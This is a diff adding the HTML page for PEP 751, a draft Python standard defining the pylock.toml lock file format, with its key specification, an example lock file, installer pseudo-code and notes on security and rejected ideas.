index 00000000000..088f437e4be
--- /dev/null
+++ b/pep-0751/index.html
@@ -0,0 +1,1528 @@
+
+


+ + +
+
+
+

PEP 751 – A file format to record Python dependencies for installation reproducibility

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Jul-2024
+
Post-History:
+
25-Jul-2024 +30-Oct-2024
+
Replaces:
+
665
+
+
+
+
+
+

Abstract

+

This PEP proposes a new file format for dependency specification +to enable reproducible installation in a Python environment. The format is +designed to be human-readable and machine-generated. Installers consuming the +file should be able to calculate what to install without the need for dependency +resolution at install-time.

+
+
+

Motivation

+

Currently, no standard exists to create an immutable record, such as a lock +file, which specifies what direct and indirect dependencies should be installed +into a virtual environment.

+

Considering there are at least five well-known solutions to this problem in the +community (pip freeze, pip-tools, uv, Poetry, and PDM), there seems to +be an appetite for lock files in general.

+

Those tools also vary in what locking scenarios they support. For instance, +pip freeze and pip-tools only generate lock files for the current +environment while PDM and Poetry try to lock for any environment to some +degree. There’s also concerns around the lack of secure defaults in the face of +supply chain attacks (e.g., always including hashes for files).

+

The lack of a standard also has some drawbacks. For instance, any tooling that wants to work with lock files must choose which format to support, potentially leaving users unsupported (e.g., Dependabot only supporting select tools, same for cloud providers who can do dependency installations on your behalf, etc.). It also impacts portability between tools, which causes vendor lock-in. Without compatibility and interoperability, tooling around lock files fractures: both users and tools have to choose a lock file format upfront, which makes it costly to use or switch to other formats. Rallying around a single format removes that cost/barrier.

+
+

Note

+

Much of the motivation from PEP 665 also applies to this PEP.

+
+
+
+

Rationale

+

The format is designed so that a locker which produces the lock file +and an installer which consumes the lock file can be separate tools. This +allows for situations such as cloud hosting providers to use their own installer +that’s optimized for their system which is independent of what locker the user +used to create their lock file.

+

The file format is designed to be human-readable. This is so that the contents +of the file can be audited by a human to make sure no undesired dependencies end +up being included in the lock file.

+

The file format is also designed to not require a resolver at install time. This +greatly simplifies installers and thus reasoning about what would be installed +when consuming a lock file. It should also lead to faster installs which are +much more frequent than creating a lock file.

+

Finally, the lock file is meant to be flexible enough to meet the various needs tools have for choosing what to install. That means the lock file records the dependency graph of what may be installed. This allows tools to enter the graph at any point and still have reproducible results from that root of the graph. Flexibility also means supporting different installation scenarios within the same lock file (e.g., with or without test dependencies).

+
+
+

Specification

+
+

File Name

+

A lock file MUST be named pylock.toml. The use of the .toml file +extension is to make syntax highlighting in editors easier and to reinforce the +fact that the file format is meant to be human-readable.

+

The lock file SHOULD be located in the directory as appropriate for the scope of +the lock file. Locking against a single pyproject.toml, for instance, would +place the pylock.toml in the same directory. If the lock file covered +multiple projects in a monorepo, then the expectation is the pylock.toml +file would be in the directory that held all the projects being locked.

+
+
+

File Format

+

The format of the file is TOML.

+

All keys listed below are required unless otherwise noted. If two keys are +mutually exclusive to one another, then one of the keys is required while the +other is disallowed.

+

Keys in tables – including the top-level table – SHOULD be emitted by lockers in the order they are listed in this PEP when applicable, unless another sort order is specified, to minimize noise in diffs. If the keys are not explicitly specified in this PEP, then the keys SHOULD be sorted in lexicographic order.

+

As well, lockers SHOULD sort arrays in lexicographic order unless otherwise +specified for the same reason.

+
+

version

+
    +
  • String
  • +
  • The version of the lock file format.
  • +
  • This PEP specifies the initial version – and only valid value until future +updates to the standard change it – as "1.0".
  • +
  • If an installer supports the major version but not the minor version, a tool +SHOULD warn when an unknown key is seen.
  • +
  • If an installer doesn’t support a major version, it MUST raise an error (see the sketch after this list).
  • +
+
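A hedged sketch of these version checks using only the standard library; the version key name follows this PEP, everything else is illustrative:

import tomllib
import warnings

SUPPORTED_MAJOR, SUPPORTED_MINOR = 1, 0  # this PEP defines only "1.0"

def read_lock_file(path: str = "pylock.toml") -> dict:
    with open(path, "rb") as file:
        lock = tomllib.load(file)
    major, minor = (int(part) for part in lock["version"].split("."))
    if major != SUPPORTED_MAJOR:
        # Unsupported major version: MUST raise an error.
        raise RuntimeError(f"unsupported lock file version: {lock['version']}")
    if minor > SUPPORTED_MINOR:
        # Supported major, newer minor: SHOULD warn on unknown keys.
        warnings.warn("newer minor version; unknown keys may be present")
    return lock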
+
+

hash-algorithm

+
    +
  • String
  • +
  • The name of the hash algorithm used for calculating all hash values.
  • +
  • Only a single hash algorithm is used for the entire file to allow hash values +to be written in inline tables for readability and compactness purposes by +only listing a single hash value instead of multiple values based on multiple +hash algorithms.
  • +
  • Specifying a single hash algorithm guarantees that an algorithm that the user +prefers is used consistently throughout the file without having to audit +each file hash value separately.
  • +
  • Allows for updating the entire file to a new hash algorithm without running +the risk of accidentally leaving an old hash value in the file.
  • +
  • JSON-based Simple API for Python Package Indexes and the hashes dictionary of the files dictionary of the Project Details dictionary specifies what values are valid and provides guidelines on what hash algorithms to use.
  • +
  • Failure to validate any hash values for any file that is to be installed MUST raise an error (see the sketch after this list).
  • +
+
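A hedged sketch of such a hash check using hashlib from the standard library; the function and parameter names are illustrative:

import hashlib

def verify_hash(path: str, expected: str, algorithm: str) -> None:
    with open(path, "rb") as file:
        digest = hashlib.file_digest(file, algorithm)  # Python 3.11+
    if digest.hexdigest() != expected:
        # Per the rule above, failing to validate MUST raise an error.
        raise ValueError(f"hash mismatch for {path!r}")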
+
+

[locker]

+
    +
  • Table
  • +
  • Record of the tool that generated the lock file.
  • +
  • Enough details SHOULD be provided such that the lock file can be reproduced from the details in this table (provided the same input data is available; e.g., for Dependabot, only the files from a repository are necessary to run the command).
  • +
+
+
locker.name
+
    +
  • String
  • +
  • The name of the tool used to create the lock file.
  • +
  • If the locker is a Python project, its normalized name SHOULD be used.
  • +
+
+
+
locker.version
+
    +
  • String
  • +
  • The version of the tool used.
  • +
+
+
+
locker.run
+
    +
  • Optional
  • +
  • Inline table
  • +
  • Records the command used to create the lock file.
  • +
+
+
locker.run.module
+
    +
  • Optional
  • +
  • String
  • +
  • The module name used for running the locker (i.e. what would be passed to +python -m).
  • +
  • Lockers MUST specify this key if the locker can be executed via python -m.
  • +
+
+
+
locker.run.args
+
    +
  • Optional
  • +
  • Array of strings
  • +
  • If the locker has a CLI, the arguments to pass to the locker.
  • +
  • All paths MUST be relative to the lock file so that another tool could use +the lock file’s location as the current working directory.
  • +
+
+
+
+
+

[[groups]]

+
    +
  • Array of tables
  • +
  • A named subset of packages as found in [[packages]].
  • +
  • Act as roots into the dependency graph.
  • +
  • Installers MUST allow the user to select one or more groups by name to +install all relevant packages together.
  • +
  • Installers SHOULD let the user skip specifying a name if there is only one +entry in the array.
  • +
+
+
groups.name
+
    +
  • String
  • +
  • The name of the group.
  • +
+
+
+
groups.project
+
    +
  • Mutually-exclusive with requirements
  • +
  • String
  • +
  • The normalized name of a package to act as the starting point into the +dependency graph.
  • +
  • Analogous to locking to the [project] table in pyproject.toml.
  • +
  • Installers MUST let a user specify any optional features/extras that the +package provides.
  • +
  • Lockers MUST NOT allow for ambiguity by specifying multiple package versions +of the same package under the same group name when a package is listed in any +project key.
  • +
+
+
+
groups.requirements
+
    +
  • Mutually-exclusive with project
  • +
  • Array of tables
  • +
  • Represents the installation requirements for this group.
  • +
  • Analogous to a key in [dependency-groups] in pyproject.toml.
  • +
  • Lockers MUST make sure that resolving any requirement for any environment does +not lead to ambiguity by having multiple values in [[packages]] match the +same requirement.
  • +
  • Values in the array SHOULD be written as inline tables, sorted +lexicographically by name, then by feature with the lack of that key +sorting first.
  • +
+
+
groups.requirements.name
+
    +
  • String
  • +
  • Normalized name of the package.
  • +
+
+
+
groups.requirements.extras
+
    +
  • Optional
  • +
  • Array of strings
  • +
  • The names of the extras specified for the requirement +(i.e. what comes between [...]).
  • +
+
+
+
groups.requirements.version
+ +
+
+
groups.requirements.marker
+ +
+
+
+
+

[[packages]]

+
    +
  • Array of tables
  • +
  • The array contains all data on the nodes of the dependency graph.
  • +
  • Lockers SHOULD record packages in order by name +lexicographically, version by its Python version specifiers +ordering, and then by groups following Python’s sort order for lists of +strings (i.e. item by item, then by length as a tiebreaker).
  • +
+
+
packages.name
+ +
+
+
packages.version
+
    +
  • String
  • +
  • The version of the package.
  • +
+
+
+
packages.groups
+
    +
  • Array of strings
  • +
  • Associates this table with the groups.name entries of the same names.
  • +
+
+
+
packages.index-url
+ +
+
+
packages.direct
+
    +
  • Optional (defaults to false)
  • +
  • Boolean
  • +
  • Represents whether the installation is via a direct URL reference.
  • +
+
+
+
packages.requires-python
+
    +
  • String
  • +
  • Holds the version specifiers for Python version compatibility for the +package and version.
  • +
  • The value MUST match what’s provided by the package version, if available, via +Requires-Python.
  • +
+
+
+
[[packages.dependencies]]
+
    +
  • Array of tables
  • +
  • A record of the dependency requirements of the package and version.
  • +
  • The values MUST semantically match what’s provided by the package version via Requires-Dist (multiple use) for all dependencies referenced in the lock file (i.e. all base dependencies plus all dependencies for extras referenced in the lock file); lock files MAY list all dependencies for unused extras if desired.
  • +
  • Values in the array SHOULD be written as inline tables, sorted +lexicographically by name, then by feature with the lack of that key +sorting first.
  • +
+
+
packages.dependencies.name
+

See groups.requirements.name.

+
+
+
packages.dependencies.extras
+

See groups.requirements.extras.

+
+
+
packages.dependencies.version
+

See groups.requirements.version.

+
+
+
packages.dependencies.marker
+

See groups.requirements.marker.

+
+
+
packages.dependencies.feature
+ +
+
+
+
packages.editable
+
    +
  • Optional (defaults to false)
  • +
  • Boolean
  • +
  • Specifies whether the package should be installed in editable mode.
  • +
+
+
+
[packages.source-tree]
+
    +
  • Optional
  • +
  • Table
  • +
  • For recording where to find the source tree for the package version.
  • +
  • Lockers SHOULD write this table inline.
  • +
  • Support for source trees by installers is optional.
  • +
  • If support is provided by an installer it SHOULD be opt-in.
  • +
  • If multiple source trees are provided, installers MUST prefer either the +vcs option or a file for security/reproducibility due to their commit or +hash, respectively.
  • +
+
+
packages.source-tree.vcs
+
    +
  • Optional
  • +
  • String
  • +
  • If specifying a VCS, the type of version control system used.
  • +
  • The valid values are specified by the +registered VCSs +of the direct URL data structure.
  • +
+
+
+
packages.source-tree.path
+
    +
  • Required if url is not set
  • +
  • String
  • +
  • A path to the source tree, which may be absolute or relative.
  • +
  • If the path is relative it MUST be relative to the lock file.
  • +
  • The path may point to a directory, a file archive, or a VCS checkout if vcs is specified.
  • +
+
+
+
packages.source-tree.url
+
    +
  • Required if path is not set
  • +
  • String
  • +
  • A URL to a file archive containing the source tree, or a VCS checkout if +vcs is specified.
  • +
+
+
+
packages.source-tree.commit
+
    +
  • Required if vcs is set
  • +
  • String
  • +
  • The commit ID for the repository which represents the package and version.
  • +
  • The value MUST be immutable for the VCS for security purposes +(e.g. no Git tags).
  • +
+
+
+
packages.source-tree.size
+
    +
  • Optional
  • +
  • Integer
  • +
  • The size in bytes for the source tree if it is a file.
  • +
  • Installers MUST verify the file size matches this value.
  • +
+
+
+
packages.source-tree.hash
+
    +
  • Required if url or path points to a file
  • +
  • String
  • +
  • The hash value of the file contents using the hash algorithm specified by +hash-algorithm.
  • +
  • Installers MUST verify the hash matches the file.
  • +
+
+
+
+
[packages.sdist]
+
    +
  • Optional
  • +
  • Table
  • +
  • The location of a source distribution as specified by +Source distribution format.
  • +
  • Lockers SHOULD write the table inline.
  • +
  • Support for source distributions by installers is optional.
  • +
  • If support is provided by an installer it SHOULD be opt-in.
  • +
+
+
packages.sdist.url
+
    +
  • Optional; mutually-exclusive with path
  • +
  • String
  • +
  • The URL to the file.
  • +
+
+
+
packages.sdist.path
+
    +
  • Optional; mutually-exclusive with url
  • +
  • String
  • +
  • A path to the file, which may be absolute or relative.
  • +
  • If the path is relative it MUST be relative to the lock file.
  • +
+
+
+
packages.sdist.upload-time
+
    +
  • Optional and only applicable when url is specified
  • +
  • Offset date time
  • +
  • The upload date and time of the file as specified by a valid ISO 8601 +date/time string for the .files[]."upload-time" field in the JSON +version of Simple repository API.
  • +
+
+
+
packages.sdist.size
+
    +
  • Optional
  • +
  • Integer
  • +
  • The size of the file in bytes.
  • +
  • Installers MUST verify the file size matches this value.
  • +
+
+
+
packages.sdist.hash
+
    +
  • String
  • +
  • The hash value of the file contents using the hash algorithm specified by +hash-algorithm.
  • +
  • Installers MUST verify the hash matches the file.
  • +
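As a sketch of the verification the size and hash MUST clauses above imply for installers (the function and parameter names are illustrative, not part of this PEP):

import hashlib

def verify_file(path, expected_hash, hash_algorithm, expected_size=None):
    """Check the recorded size (when present) and hash of a file."""
    with open(path, "rb") as file:
        data = file.read()
    if expected_size is not None and len(data) != expected_size:
        raise ValueError(f"size mismatch for {path}")
    if hashlib.new(hash_algorithm, data).hexdigest() != expected_hash:
        raise ValueError(f"hash mismatch for {path}")

The same checks apply to packages.wheels.size and packages.wheels.hash below.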
+
+
+
+
[[packages.wheels]]
+
    +
  • Optional
  • +
  • Array of tables
  • +
  • For recording the wheel files as specified by +Binary distribution format for the package version.
  • +
  • Lockers SHOULD write the table inline.
  • +
  • Lockers SHOULD sort the array values lexicographically by tag.
  • +
+
+
packages.wheels.tags
+
    +
  • Array of strings
  • +
  • The uncompressed tag portion of the wheel file name: Python, ABI, and platform (see the sketch after this list).
  • +
  • Lockers MUST make sure the tag values are unique within the +packages.wheels array.
  • +
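As an illustration of what “uncompressed” means here, the packaging library can expand the compressed tag set embedded in a wheel file name into the individual tags that lockers would record (the compressed string below is taken from the numpy wheel in the Examples section):

import packaging.tags

compressed = "cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64"
# parse_tag() expands the dotted, compressed form into individual tags.
tags = sorted(str(tag) for tag in packaging.tags.parse_tag(compressed))
# ['cp312-cp312-manylinux2014_x86_64', 'cp312-cp312-manylinux_2_17_x86_64']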
+
+
+
packages.wheels.build
+
    +
  • Optional
  • +
  • String
  • +
  • The build tag for the wheel file (if appropriate).
  • +
+
+
+
packages.wheels.url
+

See packages.sdist.url.

+
+
+
packages.wheels.path
+

See packages.sdist.path.

+
+
+
packages.wheels.upload-time
+

See packages.sdist.upload-time.

+
+
+
packages.wheels.size
+

See packages.sdist.size.

+
+
+
packages.wheels.hash
+

See packages.sdist.hash.

+
+
+
+
[packages.tool]
+
    +
  • Optional
  • +
  • Table
  • +
  • Similar usage as that of the [tool] table from the pyproject.toml specification, but at the package version level instead of at the lock file level (which is also available via [tool]).
  • +
  • Useful for scoping package version/release details (e.g., recording signing +identities to then use to verify package integrity separately from where the +package is hosted, prototyping future extensions to this file format, etc.).
  • +
+
+
+
+

[tool]

+ +
+
+
+

Examples

+
version = '1.0'
+hash-algorithm = 'sha256'
+
+[locker]
+name = 'mousebender'
+version = 'pep'
+run = { module = 'mousebender', args = ['lock', '--platform', 'cpython3.12-manylinux2014-x64', '--platform', 'cpython3.12-windows-x64', 'cattrs', 'numpy'] }
+
+[[groups]]
+name = 'Default'
+requirements = [
+  { name = 'cattrs' },
+  { name = 'numpy' },
+]
+
+[[packages]]
+name = 'attrs'
+version = '24.2.0'
+groups = ['Default']
+index-url = 'https://pypi.org/simple/attrs'
+direct = false
+requires-python = '>=3.7'
+dependencies = [
+  { name = 'importlib-metadata', marker = 'python_version < "3.8"' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'benchmark' },
+  { name = 'hypothesis', feature = 'benchmark' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'benchmark' },
+  { name = 'pympler', feature = 'benchmark' },
+  { name = 'pytest-codspeed', feature = 'benchmark' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'benchmark' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'benchmark' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'benchmark' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'cov' },
+  { name = 'coverage', extras = ['toml'], version = '>=5.3', feature = 'cov' },
+  { name = 'hypothesis', feature = 'cov' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'cov' },
+  { name = 'pympler', feature = 'cov' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'cov' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'cov' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'cov' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'dev' },
+  { name = 'hypothesis', feature = 'dev' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'dev' },
+  { name = 'pre-commit', feature = 'dev' },
+  { name = 'pympler', feature = 'dev' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'dev' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'dev' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'dev' },
+  { name = 'cogapp', feature = 'docs' },
+  { name = 'furo', feature = 'docs' },
+  { name = 'myst-parser', feature = 'docs' },
+  { name = 'sphinx', feature = 'docs' },
+  { name = 'sphinx-notfound-page', feature = 'docs' },
+  { name = 'sphinxcontrib-towncrier', feature = 'docs' },
+  { name = 'towncrier', version = '<24.7', feature = 'docs' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'tests' },
+  { name = 'hypothesis', feature = 'tests' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'tests' },
+  { name = 'pympler', feature = 'tests' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'tests' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'tests' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'tests' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'tests-mypy' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'tests-mypy' }
+]
+editable = false
+wheels = [
+  { tags = ['py3-none-any'], url = 'https://files.pythonhosted.org/packages/6a/21/5b6702a7f963e95456c0de2d495f67bf5fd62840ac655dc451586d23d39a/attrs-24.2.0-py3-none-any.whl', hash = '81921eb96de3191c8258c199618104dd27ac608d9366f5e35d011eae1867ede2', upload-time = 2024-08-06T14:37:36.958006+00:00, size = 63001 }
+]
+
+[[packages]]
+name = 'cattrs'
+version = '24.1.2'
+groups = ['Default']
+index-url = 'https://pypi.org/simple/cattrs'
+direct = false
+requires-python = '>=3.8'
+dependencies = [
+  { name = 'attrs', version = '>=23.1.0' },
+  { name = 'exceptiongroup', version = '>=1.1.1', marker = 'python_version < "3.11"' },
+  { name = 'typing-extensions', version = '!=4.6.3,>=4.1.0', marker = 'python_version < "3.11"' },
+  { name = 'pymongo', version = '>=4.4.0', feature = 'bson' },
+  { name = 'cbor2', version = '>=5.4.6', feature = 'cbor2' },
+  { name = 'msgpack', version = '>=1.0.5', feature = 'msgpack' },
+  { name = 'msgspec', version = '>=0.18.5', marker = 'implementation_name == "cpython"', feature = 'msgspec' },
+  { name = 'orjson', version = '>=3.9.2', marker = 'implementation_name == "cpython"', feature = 'orjson' },
+  { name = 'pyyaml', version = '>=6.0', feature = 'pyyaml' },
+  { name = 'tomlkit', version = '>=0.11.8', feature = 'tomlkit' },
+  { name = 'ujson', version = '>=5.7.0', feature = 'ujson' }
+]
+editable = false
+wheels = [
+  { tags = ['py3-none-any'], url = 'https://files.pythonhosted.org/packages/c8/d5/867e75361fc45f6de75fe277dd085627a9db5ebb511a87f27dc1396b5351/cattrs-24.1.2-py3-none-any.whl', hash = '67c7495b760168d931a10233f979b28dc04daf853b30752246f4f8471c6d68d0', upload-time = 2024-09-22T14:58:34.812643+00:00, size = 66446 }
+]
+
+[[packages]]
+name = 'numpy'
+version = '2.1.2'
+groups = ['Default']
+index-url = 'https://pypi.org/simple/numpy'
+direct = false
+requires-python = '>=3.10'
+dependencies = [
+
+]
+editable = false
+wheels = [
+  { tags = ['cp312-cp312-manylinux2014_x86_64', 'cp312-cp312-manylinux_2_17_x86_64'], url = 'https://files.pythonhosted.org/packages/9b/b4/e3c7e6fab0f77fff6194afa173d1f2342073d91b1d3b4b30b17c3fb4407a/numpy-2.1.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl', hash = '6d95f286b8244b3649b477ac066c6906fbb2905f8ac19b170e2175d3d799f4df', upload-time = 2024-10-05T18:36:20.729642+00:00, size = 16041825 },
+  { tags = ['cp312-cp312-win_amd64'], url = 'https://files.pythonhosted.org/packages/4c/79/73735a6a5dad6059c085f240a4e74c9270feccd2bc66e4d31b5ca01d329c/numpy-2.1.2-cp312-cp312-win_amd64.whl', hash = '456e3b11cb79ac9946c822a56346ec80275eaf2950314b249b512896c0d2505e', upload-time = 2024-10-05T18:37:38.159022+00:00, size = 12568254 }
+]
+
+
+
+
+

Expectations for Lockers

+
    +
  • Lockers MUST make sure that entering the dependency graph via a specific group +will not lead to ambiguity for installers as to which value in +[[packages]] to install for any environment (this can be controlled for +via packages.version and packages.groups).
  • +
  • Lockers SHOULD try to make all logically related groups resolve together +(i.e. no ambiguity if grouped together).
  • +
  • If a groups.project would have extras that cause ambiguity or installation failure due to conflicts between the extras, the locker MAY create separate groups.requirements entries instead; otherwise, the locker MUST raise an error.
  • +
  • Lockers MAY try to lock for multiple environments in a single lock file.
  • +
  • Lockers MAY try to update a lock file containing [tool] and +[packages.tool] for other tools than themselves.
  • +
  • Lockers MAY want to offer a way for users to provide the information necessary to lock for other environments, e.g., supporting a JSON file format which specifies wheel tags and marker values, as sketched below.
  • +
+
{
+    "marker-values": {"<marker>": "<value>"},
+    "wheel-tags": ["<tag>"]
+}
+
+
+
+
+

Expectations for Installers

+
    +
  • Installers MAY support installation of non-binary files +(i.e. source trees and source distributions), but are not required to.
  • +
  • Installers MUST provide a way to avoid non-binary file installation for +reproducibility and security purposes.
  • +
  • Installers SHOULD make it opt-in to use non-binary file installation to +facilitate a secure-by-default approach.
  • +
  • If a traversal of the graph leads to any ambiguity as to what package version +to install (i.e. more than one package version qualifies), an error MUST be +raised.
  • +
  • Installers MUST only consider package versions included in any selected +groups (i.e. installers cannot consider packages outside of the groups +selected to install from).
  • +
  • Installers MUST error out if a package version lacks a way to install into the +chosen environment.
  • +
  • Installers MUST support installing into an empty environment.
  • +
+
+

Pseudo-Code

+
import operator
+
+import packaging.markers
+import packaging.specifiers
+import packaging.tags
+
+
+class UnsatisfiableError(Exception):
+    """Raised when a requirement cannot be satisfied."""
+
+
+class AmbiguityError(Exception):
+    """Raised when a requirement has multiple solutions."""
+
+
+def install_packages(lock_file_contents):
+    # Hard-coded out of laziness.
+    packages = choose_packages(lock_file_contents, (GROUP_NAME, frozenset()))
+
+    for package in packages:
+        tags = list(packaging.tags.sys_tags())
+        for tag in tags:  # Prioritize by tag order.
+            tag_str = str(tag)
+            for wheel in package["wheels"]:
+                if tag_str in wheel["tags"]:
+                    break
+            else:
+                continue
+            break
+        else:
+            raise UnsatisfiableError(
+                f"No wheel for {package['name']} {package['version']}"
+            )
+        print(f"Installing {package['name']} {package['version']} ({tag_str})")
+
+
+def choose_packages(lock_file_data, *selected_groups):
+    """Select the package versions that should be installed based on the requested groups.
+
+    'selected_groups' is a sequence of two-item tuples, representing a group name and
+    optionally any requested extras if the group is a project.
+    """
+    group_names = frozenset(operator.itemgetter(0)(group) for group in selected_groups)
+    available_packages = {}  # The packages in the selected groups.
+    for pkg in lock_file_data["packages"]:
+        if frozenset(pkg["groups"]) & group_names:
+            available_packages.setdefault(pkg["name"], []).append(pkg)
+    selected_packages = {}  # The package versions that have been selected.
+    handled_extras = {}  # The extras that have been handled.
+    requirements = []  # A stack of requirements to satisfy.
+
+    # First, get our starting list of requirements.
+    for group in selected_groups:
+        requirements.extend(gather_requirements(lock_file_data, group))
+
+    # Next, go through the requirements and try to find a **single** package version
+    # that satisfies each requirement.
+    while requirements:
+        req = requirements.pop()
+        # Ignore requirements whose markers disqualify it.
+        if not applies_to_env(req):
+            continue
+        name = req["name"]
+        if pkg := selected_packages.get(name):
+            # Safety check that the cross-section of groups doesn't cause issues.
+            # It somewhat assumes the locker didn't mess up such that there would be
+            # ambiguity by what package version was initially selected.
+            if not version_satisfies(req, pkg):
+                raise UnsatisfiableError(
+                    f"requirement {req!r} not satisfied by "
+                    f"{selected_packages[req['name']]!r}"
+                )
+            if "extras" not in req:
+                continue
+            needed_extras = req["extras"]
+            extras = handled_extras.setdefault(name, set())
+            if not frozenset(needed_extras).difference(extras):
+                # All requested extras have already been handled.
+                continue
+            # This isn't optimal as we may tread over the same extras multiple times,
+            # but eventually the maximum set of extras for the package will be handled
+            # and thus the above guard will short-circuit adding any more requirements.
+            extras.update(needed_extras)
+        else:
+            # Raises UnsatisfiableError or AmbiguityError if no suitable, single package
+            # version is found.
+            pkg = compatible_package_version(req, available_packages[req["name"]])
+            selected_packages[name] = pkg
+        requirements.extend(dependencies(pkg, req))
+
+    return selected_packages.values()
+
+
+def gather_requirements(locked_file_data, group):
+    """Return a collection of all requirements for a group."""
+    # Hard-coded to support `groups.requirements` out of laziness.
+    group_name, _extras = group
+    for group in locked_file_data["groups"]:
+        if group["name"] == group_name:
+            return group["requirements"]
+    else:
+        raise ValueError(f"Group {group_name!r} not found in lock file")
+
+
+def applies_to_env(requirement):
+    """Check if the requirement applies to the current environment."""
+    try:
+        markers = requirement["marker"]
+    except KeyError:
+        return True
+    else:
+        return packaging.markers.Marker(markers).evaluate()
+
+
+def version_satisfies(requirement, package):
+    """Check if the package version satisfies the requirement."""
+    try:
+        raw_specifier = requirement["version"]
+    except KeyError:
+        return True
+    else:
+        specifier = packaging.specifiers.SpecifierSet(raw_specifier)
+        return specifier.contains(package["version"], prereleases=True)
+
+
+def compatible_package_version(requirement, available_packages):
+    """Return the package version that satisfies the requirement.
+
+    If no package version can satisfy the requirement, raise UnsatisfiableError. If
+    multiple package versions can satisfy the requirement, raise AmbiguityError.
+    """
+    possible_packages = [
+        pkg for pkg in available_packages if version_satisfies(requirement, pkg)
+    ]
+    if not possible_packages:
+        raise UnsatisfiableError(f"No package version satisfies {requirement!r}")
+    elif len(possible_packages) > 1:
+        raise AmbiguityError(f"Multiple package versions satisfy {requirement!r}")
+    return possible_packages[0]
+
+
+def dependencies(package, requirement):
+    """Return the dependencies of the package.
+
+    The extras from the requirement will extend the base requirements as needed.
+    """
+    applicable_deps = []
+    extras = frozenset(requirement.get("extras", []))
+    for dep in package["dependencies"]:
+        if "feature" not in dep or dep["feature"] in extras:
+            applicable_deps.append(dep)
+    return applicable_deps
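A hypothetical driver for the pseudo-code above; the file name and GROUP_NAME value are illustrative (GROUP_NAME is the group the pseudo-code hard-codes).

import tomllib

GROUP_NAME = "Default"  # The group install_packages() hard-codes.

with open("pylock.toml", "rb") as file:
    lock_file_contents = tomllib.load(file)

install_packages(lock_file_contents)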
+
+
+
+
+
+
+

Backwards Compatibility

+

Because there is no preexisting lock file format, there are no explicit +backwards-compatibility concerns in terms of Python packaging standards.

+

As for packaging tools themselves, that will be a per-tool decision. Tools that don’t document their lock file format could choose to simply start using the format internally and then transition to saving their lock files with a name supported by this PEP. Tools with a preexisting, documented format could provide an option to choose which format to emit.

+
+
+

Security Implications

+

The hope is that by standardizing on a lock file format that starts from a +security-first posture it will help make overall packaging installation safer. +However, this PEP does not solve all potential security concerns.

+

One potential concern is tampering with a lock file. If a lock file is not kept +in source control and properly audited, a bad actor could change the file in +nefarious ways (e.g. point to a malware version of a package). Tampering could +also occur in transit to e.g. a cloud provider who will perform an installation +on the user’s behalf. Both could be mitigated by signing the lock file either +within the file in a [tool] entry or via a side channel external to the lock +file itself.

+

This PEP does not do anything to prevent a user from installing an incorrect package. While the format includes many details to help in auditing a package’s inclusion, there isn’t any mechanism to stop e.g. name-confusion attacks via typosquatting. Lockers may be able to provide some UX to help with this (e.g. by providing download counts for a package).

+
+
+

How to Teach This

+

Users should be informed that when they ask to install some package, that +package may have its own dependencies, those dependencies may have dependencies, +and so on. Without writing down what gets installed as part of installing the +package they requested, things could change from underneath them (e.g., package +versions). Changes to the underlying dependencies can lead to accidental +breakage of their code. Lock files help deal with that by providing a way to +write down what was (and should be) installed.

+

Having what to install written down also helps in collaborating with others. By +agreeing to a lock file’s contents, everyone ends up with the same packages +installed. This helps make sure no one relies on e.g. an API that’s only +available in a certain version that not everyone working on the project has +installed.

+

Lock files also help with security by making sure you always get the same files installed, not a malicious substitute that someone may have slipped in. They also let one be more deliberate about upgrading dependencies, making sure any change is on purpose and not introduced by a bad actor.

+
+
+

Reference Implementation

+

A proof-of-concept implementing most of this PEP for wheels can be found at +https://github.com/brettcannon/mousebender/tree/pep .

+
+
+

Rejected Ideas

+
+

A flat set of packages to install

+

An earlier version of this PEP proposed to use a flat set of package versions +instead of a graph. The idea was that each package version could be evaluated in +isolation as to whether it applied to an environment for installation. The hope +was that would lend itself to easier auditing as one wouldn’t have to worry +about how a package version fit into the graph when looking at e.g., a diff for +a lock file.

+

Unfortunately this was deemed not as flexible as using a graph. For instance, recording the graph assists in dependency analysis for tools like GitHub. A graph also makes it easier to follow how you ended up with a given dependency from any point in the lock file. It also balances the implementation costs between lockers and installers by shifting some complexity off of lockers for only a minor increase in complexity for installers, who can use standard graph-traversal algorithms instead of a linear walk.

+

And if the dependency graph is already being recorded for the above benefits, then recording that same data in a flattened manner is redundant and makes lock files larger and potentially more unwieldy.

+
+
+

Specifying a new core metadata version that requires consistent metadata across files

+

